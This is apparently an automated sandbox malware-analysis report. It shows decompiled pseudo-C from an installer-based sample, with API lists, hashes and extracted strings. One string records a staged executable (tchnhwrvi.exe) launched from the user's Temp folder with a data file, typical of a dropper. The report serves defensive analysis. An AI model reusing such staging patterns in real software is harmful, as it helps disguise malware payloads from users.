                    							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                    						}
                    						_t66 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                    						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                    						if( *_t91 != _t83) {
                    							_t76 =  *((intOrPtr*)(_t107 + 8));
                    							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                    						}
                    						_t68 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                    						_t70 =  *((intOrPtr*)(_t107 + 8));
                    						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                    						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                    							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                    							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                    						}
                    						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                    						 *((intOrPtr*)( *_t72 + 8))(_t72);
                    					}
                    					_t62 =  *((intOrPtr*)(_t107 + 8));
                    					 *((intOrPtr*)( *_t62 + 8))(_t62);
                    					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                    						_push(0xfffffff4);
                    					} else {
                    						goto L14;
                    					}
                    				}
                    				E00401423();
                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                    				return 0;
                    			}

                    APIs
                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CreateInstance
                    • String ID:
                    • API String ID: 542301482-0
                    • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                    • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                    • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                    • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E0040290B(short __ebx, short* __edi) {
                    				void* _t21;
                    
                    				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                    					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                    					_push(_t21 - 0x2b0);
                    					_push(__edi);
                    					E00406668();
                    				} else {
                    					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                    					 *__edi = __ebx;
                    					 *((intOrPtr*)(_t21 - 4)) = 1;
                    				}
                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                    				return 0;
                    			}

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                    • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                    • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                    • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                    				struct HWND__* _v8;
                    				struct HWND__* _v12;
                    				long _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				intOrPtr _v28;
                    				signed char* _v32;
                    				int _v36;
                    				signed int _v44;
                    				int _v48;
                    				signed int* _v60;
                    				signed char* _v64;
                    				signed int _v68;
                    				long _v72;
                    				void* _v76;
                    				intOrPtr _v80;
                    				intOrPtr _v84;
                    				void* _v88;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t198;
                    				intOrPtr _t201;
                    				long _t207;
                    				signed int _t211;
                    				signed int _t222;
                    				void* _t225;
                    				void* _t226;
                    				int _t232;
                    				long _t237;
                    				long _t238;
                    				signed int _t239;
                    				signed int _t245;
                    				signed int _t247;
                    				signed char _t248;
                    				signed char _t254;
                    				void* _t258;
                    				void* _t260;
                    				signed char* _t278;
                    				signed char _t279;
                    				long _t284;
                    				struct HWND__* _t291;
                    				signed int* _t292;
                    				int _t293;
                    				long _t294;
                    				signed int _t295;
                    				void* _t297;
                    				long _t298;
                    				int _t299;
                    				signed int _t300;
                    				signed int _t303;
                    				signed int _t311;
                    				signed char* _t319;
                    				int _t324;
                    				void* _t326;
                    
                    				_t291 = _a4;
                    				_v12 = GetDlgItem(_t291, 0x3f9);
                    				_v8 = GetDlgItem(_t291, 0x408);
                    				_t326 = SendMessageW;
                    				_v24 =  *0x42a288;
                    				_v28 =  *0x42a270 + 0x94;
                    				if(_a8 != 0x110) {
                    					L23:
                    					if(_a8 != 0x405) {
                    						_t301 = _a16;
                    					} else {
                    						_a12 = 0;
                    						_t301 = 1;
                    						_a8 = 0x40f;
                    						_a16 = 1;
                    					}
                    					if(_a8 == 0x4e || _a8 == 0x413) {
                    						_v16 = _t301;
                    						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                    							if(( *0x42a279 & 0x00000002) != 0) {
                    								L41:
                    								if(_v16 != 0) {
                    									_t237 = _v16;
                    									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                    										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                    									}
                    									_t238 = _v16;
                    									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                    										_t301 = _v24;
                    										_t239 =  *(_t238 + 0x5c);
                    										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                    										} else {
                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                    										}
                    									}
                    								}
                    								goto L48;
                    							}
                    							if(_a8 == 0x413) {
                    								L33:
                    								_t301 = 0 | _a8 != 0x00000413;
                    								_t245 = E00404F7F(_v8, _a8 != 0x413);
                    								_t295 = _t245;
                    								if(_t295 >= 0) {
                    									_t94 = _v24 + 8; // 0x8
                    									_t301 = _t245 * 0x818 + _t94;
                    									_t247 =  *_t301;
                    									if((_t247 & 0x00000010) == 0) {
                    										if((_t247 & 0x00000040) == 0) {
                    											_t248 = _t247 ^ 0x00000001;
                    										} else {
                    											_t254 = _t247 ^ 0x00000080;
                    											if(_t254 >= 0) {
                    												_t248 = _t254 & 0x000000fe;
                    											} else {
                    												_t248 = _t254 | 0x00000001;
                    											}
                    										}
                    										 *_t301 = _t248;
                    										E0040117D(_t295);
                    										_a12 = _t295 + 1;
                    										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                    										_a8 = 0x40f;
                    									}
                    								}
                    								goto L41;
                    							}
                    							_t301 = _a16;
                    							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                    								goto L41;
                    							}
                    							goto L33;
                    						} else {
                    							goto L48;
                    						}
                    					} else {
                    						L48:
                    						if(_a8 != 0x111) {
                    							L56:
                    							if(_a8 == 0x200) {
                    								SendMessageW(_v8, 0x200, 0, 0);
                    							}
                    							if(_a8 == 0x40b) {
                    								_t225 =  *0x42372c;
                    								if(_t225 != 0) {
                    									ImageList_Destroy(_t225);
                    								}
                    								_t226 =  *0x423740;
                    								if(_t226 != 0) {
                    									GlobalFree(_t226);
                    								}
                    								 *0x42372c = 0;
                    								 *0x423740 = 0;
                    								 *0x42a2c0 = 0;
                    							}
                    							if(_a8 != 0x40f) {
                    								L90:
                    								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                    									_t324 = (0 | _a16 == 0x00000020) << 3;
                    									ShowWindow(_v8, _t324);
                    									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                    								}
                    								goto L93;
                    							} else {
                    								E004011EF(_t301, 0, 0);
                    								_t198 = _a12;
                    								if(_t198 != 0) {
                    									if(_t198 != 0xffffffff) {
                    										_t198 = _t198 - 1;
                    									}
                    									_push(_t198);
                    									_push(8);
                    									E00404FFF();
                    								}
                    								if(_a16 == 0) {
                    									L75:
                    									E004011EF(_t301, 0, 0);
                    									_v36 =  *0x423740;
                    									_t201 =  *0x42a288;
                    									_v64 = 0xf030;
                    									_v24 = 0;
                    									if( *0x42a28c <= 0) {
                    										L86:
                    										if( *0x42a31e == 0x400) {
                    											InvalidateRect(_v8, 0, 1);
                    										}
                    										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                    											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                    										}
                    										goto L90;
                    									}
                    									_t292 = _t201 + 8;
                    									do {
                    										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                    										if(_t207 != 0) {
                    											_t303 =  *_t292;
                    											_v72 = _t207;
                    											_v76 = 8;
                    											if((_t303 & 0x00000001) != 0) {
                    												_v76 = 9;
                    												_v60 =  &(_t292[4]);
                    												_t292[0] = _t292[0] & 0x000000fe;
                    											}
                    											if((_t303 & 0x00000040) == 0) {
                    												_t211 = (_t303 & 0x00000001) + 1;
                    												if((_t303 & 0x00000010) != 0) {
                    													_t211 = _t211 + 3;
                    												}
                    											} else {
                    												_t211 = 3;
                    											}
                    											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                    											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                    											SendMessageW(_v8, 0x113f, 0,  &_v76);
                    										}
                    										_v24 = _v24 + 1;
                    										_t292 =  &(_t292[0x206]);
                    									} while (_v24 <  *0x42a28c);
                    									goto L86;
                    								} else {
                    									_t293 = E004012E2( *0x423740);
                    									E00401299(_t293);
                    									_t222 = 0;
                    									_t301 = 0;
                    									if(_t293 <= 0) {
                    										L74:
                    										SendMessageW(_v12, 0x14e, _t301, 0);
                    										_a16 = _t293;
                    										_a8 = 0x420;
                    										goto L75;
                    									} else {
                    										goto L71;
                    									}
                    									do {
                    										L71:
                    										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                    											_t301 = _t301 + 1;
                    										}
                    										_t222 = _t222 + 1;
                    									} while (_t222 < _t293);
                    									goto L74;
                    								}
                    							}
                    						}
                    						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                    							goto L93;
                    						} else {
                    							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                    							if(_t232 == 0xffffffff) {
                    								goto L93;
                    							}
                    							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                    							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                    								_t294 = 0x20;
                    							}
                    							E00401299(_t294);
                    							SendMessageW(_a4, 0x420, 0, _t294);
                    							_a12 = _a12 | 0xffffffff;
                    							_a16 = 0;
                    							_a8 = 0x40f;
                    							goto L56;
                    						}
                    					}
                    				} else {
                    					_v36 = 0;
                    					_v20 = 2;
                    					 *0x42a2c0 = _t291;
                    					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                    					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                    					 *0x423734 =  *0x423734 | 0xffffffff;
                    					_t297 = _t258;
                    					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                    					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                    					 *0x42372c = _t260;
                    					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                    					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                    					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                    						SendMessageW(_v8, 0x111b, 0x10, 0);
                    					}
                    					DeleteObject(_t297);
                    					_t298 = 0;
                    					do {
                    						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                    						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                    							if(_t298 != 0x20) {
                    								_v20 = 0;
                    							}
                    							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                    						}
                    						_t298 = _t298 + 1;
                    					} while (_t298 < 0x21);
                    					_t299 = _a16;
                    					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                    					_push(0x15);
                    					E004045C4(_a4);
                    					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                    					_push(0x16);
                    					E004045C4(_a4);
                    					_t300 = 0;
                    					_v16 = 0;
                    					if( *0x42a28c <= 0) {
                    						L19:
                    						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                    						goto L20;
                    					} else {
                    						_t319 = _v24 + 8;
                    						_v32 = _t319;
                    						do {
                    							_t278 =  &(_t319[0x10]);
                    							if( *_t278 != 0) {
                    								_v64 = _t278;
                    								_t279 =  *_t319;
                    								_v88 = _v16;
                    								_t311 = 0x20;
                    								_v84 = 0xffff0002;
                    								_v80 = 0xd;
                    								_v68 = _t311;
                    								_v44 = _t300;
                    								_v72 = _t279 & _t311;
                    								if((_t279 & 0x00000002) == 0) {
                    									if((_t279 & 0x00000004) == 0) {
                    										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                    									} else {
                    										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                    									}
                    								} else {
                    									_v80 = 0x4d;
                    									_v48 = 1;
                    									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                    									_v36 = 1;
                    									 *( *0x423740 + _t300 * 4) = _t284;
                    									_v16 =  *( *0x423740 + _t300 * 4);
                    								}
                    							}
                    							_t300 = _t300 + 1;
                    							_t319 =  &(_v32[0x818]);
                    							_v32 = _t319;
                    						} while (_t300 <  *0x42a28c);
                    						if(_v36 != 0) {
                    							L20:
                    							if(_v20 != 0) {
                    								E004045F9(_v8);
                    								goto L23;
                    							} else {
                    								ShowWindow(_v12, 5);
                    								E004045F9(_v12);
                    								L93:
                    								return E0040462B(_a8, _a12, _a16);
                    							}
                    						}
                    						goto L19;
                    					}
                    				}
                    			}

                    APIs
                    • GetDlgItem.USER32 ref: 00405049
                    • GetDlgItem.USER32 ref: 00405054
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                    • LoadImageW.USER32 ref: 004050B5
                    • SetWindowLongW.USER32 ref: 004050CE
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                    • DeleteObject.GDI32(00000000), ref: 0040512B
                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                    • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                    • SetWindowLongW.USER32 ref: 0040527D
                    • ShowWindow.USER32(?,00000005), ref: 0040528D
                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                    • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                    • GlobalFree.KERNEL32 ref: 0040546B
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                    • ShowWindow.USER32(?,00000000), ref: 00405615
                    • GetDlgItem.USER32 ref: 00405620
                    • ShowWindow.USER32(00000000), ref: 00405627
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $M$N
                    • API String ID: 2564846305-813528018
                    • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                    • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                    • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                    • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                    				intOrPtr _v8;
                    				int _v12;
                    				void* _v16;
                    				struct HWND__* _t56;
                    				signed int _t75;
                    				signed short* _t76;
                    				signed short* _t78;
                    				long _t92;
                    				int _t103;
                    				signed int _t110;
                    				intOrPtr _t113;
                    				WCHAR* _t114;
                    				signed int* _t116;
                    				WCHAR* _t117;
                    				struct HWND__* _t118;
                    
                    				if(_a8 != 0x110) {
                    					if(_a8 != 0x111) {
                    						L13:
                    						if(_a8 != 0x4e) {
                    							if(_a8 == 0x40b) {
                    								 *0x421714 =  *0x421714 + 1;
                    							}
                    							L27:
                    							_t114 = _a16;
                    							L28:
                    							return E0040462B(_a8, _a12, _t114);
                    						}
                    						_t56 = GetDlgItem(_a4, 0x3e8);
                    						_t114 = _a16;
                    						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                    							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                    							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                    							_v12 = _t103;
                    							_v16 = _t113;
                    							_v8 = 0x428200;
                    							if(_t103 - _t113 < 0x800) {
                    								SendMessageW(_t56, 0x44b, 0,  &_v16);
                    								SetCursor(LoadCursorW(0, 0x7f02));
                    								_push(1);
                    								E00404A32(_a4, _v8);
                    								SetCursor(LoadCursorW(0, 0x7f00));
                    								_t114 = _a16;
                    							}
                    						}
                    						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                    							goto L28;
                    						} else {
                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                    								SendMessageW( *0x42a268, 0x111, 1, 0);
                    							}
                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                    								SendMessageW( *0x42a268, 0x10, 0, 0);
                    							}
                    							return 1;
                    						}
                    					}
                    					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                    						goto L27;
                    					} else {
                    						_t116 =  *0x422720 + 0x14;
                    						if(( *_t116 & 0x00000020) == 0) {
                    							goto L27;
                    						}
                    						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                    						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                    						E00404A0E();
                    						goto L13;
                    					}
                    				}
                    				_t117 = _a16;
                    				_t75 =  *(_t117 + 0x30);
                    				if(_t75 < 0) {
                    					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                    				}
                    				_t76 =  *0x42a298 + _t75 * 2;
                    				_t110 =  *_t76 & 0x0000ffff;
                    				_a8 = _t110;
                    				_t78 =  &(_t76[1]);
                    				_a16 = _t78;
                    				_v16 = _t78;
                    				_v12 = 0;
                    				_v8 = E00404734;
                    				if(_t110 != 2) {
                    					_v8 = E004046FA;
                    				}
                    				_push( *((intOrPtr*)(_t117 + 0x34)));
                    				_push(0x22);
                    				E004045C4(_a4);
                    				_push( *((intOrPtr*)(_t117 + 0x38)));
                    				_push(0x23);
                    				E004045C4(_a4);
                    				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                    				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                    				_t118 = GetDlgItem(_a4, 0x3e8);
                    				E004045F9(_t118);
                    				SendMessageW(_t118, 0x45b, 1, 0);
                    				_t92 =  *( *0x42a270 + 0x68);
                    				if(_t92 < 0) {
                    					_t92 = GetSysColor( ~_t92);
                    				}
                    				SendMessageW(_t118, 0x443, 0, _t92);
                    				SendMessageW(_t118, 0x445, 0, 0x4010000);
                    				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                    				 *0x421714 = 0;
                    				SendMessageW(_t118, 0x449, _a8,  &_v16);
                    				 *0x421714 = 0;
                    				return 0;
                    			}



















                    APIs
                    • CheckDlgButton.USER32 ref: 00404821
                    • GetDlgItem.USER32 ref: 00404835
                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                    • GetSysColor.USER32(?), ref: 00404863
                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                    • lstrlenW.KERNEL32(?), ref: 00404884
                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                    • GetDlgItem.USER32 ref: 004048FF
                    • SendMessageW.USER32(00000000), ref: 00404906
                    • GetDlgItem.USER32 ref: 00404931
                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                    • SetCursor.USER32(00000000), ref: 00404985
                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                    • SetCursor.USER32(00000000), ref: 004049A1
                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                    Strings
                    • N, xrefs: 0040491F
                    • "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo, xrefs: 00404960
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                    • String ID: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo$N
                    • API String ID: 3103080414-1178858743
                    • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                    • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                    • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                    • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004062AE(void* __ecx) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				long _t12;
                    				long _t24;
                    				char* _t31;
                    				int _t37;
                    				void* _t38;
                    				intOrPtr* _t39;
                    				long _t42;
                    				WCHAR* _t44;
                    				void* _t46;
                    				void* _t48;
                    				void* _t49;
                    				void* _t52;
                    				void* _t53;
                    
                    				_t38 = __ecx;
                    				_t44 =  *(_t52 + 0x14);
                    				 *0x426de8 = 0x55004e;
                    				 *0x426dec = 0x4c;
                    				if(_t44 == 0) {
                    					L3:
                    					_t2 = _t52 + 0x1c; // 0x4275e8
                    					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                    					if(_t12 != 0 && _t12 <= 0x400) {
                    						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                    						_t53 = _t52 + 0x10;
                    						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                    						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                    						_t48 = _t12;
                    						 *(_t53 + 0x18) = _t48;
